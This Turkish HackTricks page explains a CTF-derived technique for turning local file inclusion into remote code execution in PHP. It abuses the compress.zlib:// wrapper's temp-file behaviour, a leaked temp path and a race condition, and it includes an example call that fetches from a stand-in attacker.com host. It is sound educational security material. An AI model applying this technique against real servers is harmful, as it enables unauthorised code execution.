5.7 KiB
LFI2RCE Via compress.zlib + PHP_STREAM_PREFER_STUDIO + Path Disclosure
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
WhiteIntel
WhiteIntel karanlık ağ destekli bir arama motorudur ve bir şirketin veya müşterilerinin stealer malwares tarafından tehdit edilip edilmediğini kontrol etmek için ücretsiz işlevsellikler sunar.
WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Web sitelerini kontrol edebilir ve motorlarını ücretsiz deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
compress.zlib://
ve PHP_STREAM_PREFER_STDIO
compress.zlib://
protokolü ile PHP_STREAM_PREFER_STDIO
bayrağı kullanılarak açılan bir dosya, bağlantıya daha sonra gelen verileri aynı dosyaya yazmaya devam edebilir.
Bu, şu şekilde bir çağrının yapılabileceği anlamına gelir:
file_get_contents("compress.zlib://http://attacker.com/file")
Bir istek göndererek http://attacker.com/file adresini talep edecektir, ardından sunucu isteğe geçerli bir HTTP yanıtı ile yanıt verebilir, bağlantıyı açık tutabilir ve daha sonra dosyaya yazılacak ek veriler gönderebilir.
Bu bilgiyi php-src kodunun main/streams/cast.c kısmında görebilirsiniz:
/* Use a tmpfile and copy the old streams contents into it */
if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_fopen_tmpfile();
} else {
*newstream = php_stream_temp_new();
}
Yarış Koşulu ile RCE
Bu CTF önceki hile kullanılarak çözüldü.
Saldırgan, kurban sunucunun saldırganın sunucusundan bir dosya okuma bağlantısı açmasını sağlayacaktır compress.zlib
protokolünü kullanarak.
Bu bağlantı var olduğu sürece, saldırgan oluşturulan geçici dosyanın yolunu sızdıracaktır (sunucu tarafından sızdırılmıştır).
Bağlantı hala açıkken, saldırgan kontrol ettiği geçici dosyayı yükleyen bir LFI'yi istismar edecektir.
Ancak, web sunucusunda <?
içeren dosyaların yüklenmesini önleyen bir kontrol vardır. Bu nedenle, saldırgan bir Yarış Koşulu istismar edecektir. Hala açık olan bağlantıda saldırgan, web sunucusu dosyanın yasaklı karakterleri içerip içermediğini kontrol ettikten SONRA PHP yükünü gönderecektir ama içeriğini yüklemeden ÖNCE.
Daha fazla bilgi için https://balsn.tw/ctf_writeup/20191228-hxp36c3ctf/#includer adresindeki Yarış Koşulu ve CTF açıklamasını kontrol edin.
WhiteIntel
WhiteIntel, stealer malwares tarafından tehdit edilen bir şirketin veya müşterilerinin durumunu kontrol etmek için ücretsiz işlevsellikler sunan bir karanlık ağ destekli arama motorudur.
WhiteIntel'in ana hedefi, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Web sitelerini kontrol edebilir ve motorlarını ücretsiz deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.